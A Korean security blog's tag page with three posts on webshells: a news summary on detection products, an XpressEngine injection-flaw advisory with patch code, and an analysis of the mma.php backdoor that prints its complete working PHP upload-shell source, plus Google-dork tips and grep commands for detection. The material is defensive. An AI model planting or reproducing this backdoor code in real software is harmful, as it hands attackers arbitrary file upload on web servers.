'webshell'에 해당되는 글 4건

  1. 2015.06.09 웹셸 탐지 및 방어 솔루션
  2. 2012.05.18 국내 공개 웹 게시판(익스프레스엔진) 보안 업데이트
  3. 2012.04.02 Analysis on mma.php Backdoor Shell
2015.06.09 14:51

웹셸 탐지 및 방어 솔루션

해킹당한 웹서버 중 90% 이상 웹서버에서 웹셸 발견 
웹 보안의 기본은 웹셸 탐지 및 방어...웹셸 방어 솔루션 살펴보니

http://www.boannews.com/media/view.asp?idx=46468&kind=0


KISA 인터넷침해대응센터에 따르면, 해킹당한 웹서버 중 웹셸이 발견된 웹서버는 90% 이상이다. 지난해 2월 26일 의사협회 8만명, 치과의사협회 5만 6천명, 한의사협회 2만명 등 총 15만 6천명의 개인정보가 유출됐다. 이 3개 협회 홈페이지는 공격자가 악성코드를 웹사이트에 심어서 관리자 권한을 획득한 후, 웹셸을 이용해 개인정보를 탈취한 것으로 조사됐다. 지난해 3월 7일 113만명의 개인정보가 유출된 티켓몬스터의 경우에도 공격자가 홈페이지 게시판 등에 웹셸을 심어 해킹했다.


이와 같은 웹셸을 탐지하고 방어하기 위해서는 웹셸전용 보안 솔루션을 사용하는 것이 보다 효과적이다. 기존 네트워크와 서버 보안 체계에서 웹셸 탐지가 쉽지 않기 때문. 그 이유는 여러 가지인데, 일례로 방화벽의 경우에는 허용된 IP나 포트로부터의 공격은 방어하기 어렵다. 또 네트워크 계층에서의 유해성 검사를 진행하는 IDS/IPS의 경우에는 애플리케이션 취약성 공격에 대해서는 방어가 거의 불가능하다.


이에 많은 사람들이 이용하는 공공기관의 홈페이지는 웹 보안 강화는 필수적이다. 웹셸에 효과적으로 대응하기 위해서는 웹 애플리케이션 파일의 임의 생성 및 변조를 실시간으로 탐지해야 하고 탐지 즉시 처리할 수 있어야 한다. 특히 ASP, JSP, PHP 등 다양한 웹 스크립트 탐지를 지원하고 지속적인 R&D를 통해 진화하는 웹쉘 탐지 패턴을 보유할 수 있어야 한다. 또한, 상시 모니터링으로 취약점을 제거하고 웹사이트의 개발·운영 전반에 걸쳐 보안을 강화해야 한다.


▲ 국내 주요 웹셸 탐지·방어 솔루션 업체 및 제품(업체명 가나다순)



출처 : 보안뉴스



Trackback 0 Comment 0
2012.05.18 19:40

국내 공개 웹 게시판(익스프레스엔진) 보안 업데이트

□ 개요

  o 국내 PHP기반의 공개 웹 게시판인 익스프레스엔진에서 웹쉘코드 삽입 취약점이 발견됨

  o 취약한 버전을 사용하고 있을 경우, 홈페이지 해킹에 의해 웹서버 원격제어, 홈페이지 변조,

    데이터베이스 정보 유출 등의 피해를 입을 수 있으므로 웹 관리자의 적극적인 조치 필요



□ 해당시스템

  o 영향받는 소프트웨어

     - 익스프레스 엔진 1.5.2.4 및 이전 버전



□ 해결방안

  o 기존 익스프레스 엔진 사용자는 업데이트가 적용된 상위 버전으로 업그레이드 [1]

    ※ 패치 작업 이전에 원본 파일은 백업 필요

  o 익스프레스 엔진을 새로 설치하는 이용자

     - 반드시 보안패치가 적용된 최신버전(1.5.2.5 이상)을 설치


* old
foreach($ftp_info as $key => $val) {
    if(!$val) continue;
    $buff .= sprintf("\$ftp_info->%s = '%s';\n", $key, str_replace("'","\\'",$val));
}

* new
foreach($ftp_info as $key => $val) {
    if(!$val) continue;
if(preg_match('/(<\?|<\?php|\?>)/xsm', preg_replace('/\s/', '', $val)))
{
continue;
}
    $buff .= sprintf("\$ftp_info->%s = '%s';\n", $key, str_replace("'","\\'",$val));
}


□ 용어 정리

  o PHP : 동적인 웹사이트를 위한 서버 측 스크립트 언어

  o 웹쉘(Webshell) : php, jsp, asp 등 스크립트 언어로 되어 있으며, 원격에서

     웹서버를 제어할 수 있어 다양한 공격 사용될 수 있는 웹서버형 악성코드

  o 익스프레스엔진 : PHP언어로 작성된 홈페이지용 게시판 소프트웨어 또는 프레임 워크



□ 문의사항

  o 한국인터넷진흥원 인터넷침해대응센터: 국번없이 118



□ 기타

  o 본 취약점은 Krcert 홈페이지를 통해 장경칩(Black Falcon)님께서 제공해주셨습니다.



[참고사이트]

[1] http://www.xpressengine.com/blog/textyle/20809565


Trackback 0 Comment 0
2012.04.02 18:38

Analysis on mma.php Backdoor Shell

All right guys, today let’s have a look on a very common backdoor shell today that allows an attacker to upload arbitrary files on the web server. The name of this shell is mma.php and is commonly named or uploaded in the websites I’ve been inspecting for possible backdoor uploads by using the power of Google dorks.

My first encounter with this backdoor shell was like two years ago and I was still a seminarian during that time. I decided to write about it because it is still used by some defacers or attackers. Here is the script:

<?php echo ‘<b><br><br>’.php_uname().’<br></b>’; echo ‘<form action=”" method=”post” enctype=”multipart/form-data” name=”uploader” id=”uploader”>’; echo ‘<input type=”file” name=”file” size=”50″><input name=”_upl” type=”submit” id=”_upl” value=”Upload”></form>’; if( $_POST['_upl'] == “Upload” ) {     if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo ‘<b>uplod d0n3 in SAME file // Th3 MMA \\</b><br><br>’; }     else { echo ‘<b>Upload GAGAL !!!</b><br><br>’; } } ?>

And this is how it looks like:

It echos the kernel version because of the php_uname() function. At least we know a php function that can be used to find this backdoor shell. So what makes this backdoor shell risky? Well like I said, it allows the attacker to upload arbitrary files which means, he can host his scripts, upload more backdoor shells, host other php files. Mma.php is one of the backdoor shells that doesn’t use shell_exec to avoidother antivirus or rootkit hunters from detecting it as a suspicious file.

If the file uploading is successful, it echos “uplod d0n3 in SAME file // Th3 MMA \” or else it echos “Upload GAGAL !!!”, thus if Google caches the page, it also allows the attacker to dork these keywords to find this backdoor shell.

With most attackers using the name mma.php, it allows other Google dorkers to search for this file by using inurl:”mma.php” for example. In my recent researches about this backdoor shell, most attackers usually upload it in the /image file directory which some web servers allow directory listing, allowing the attackers to view the backdoor shell easier.

To locate this backdoor shell, you just need to issue these commands in your terminal:

grep -Rn “php_uname *(” /var/www

find / -name mma.php

Be safe guys!


출처 : theprojectxblog.net



Trackback 0 Comment 0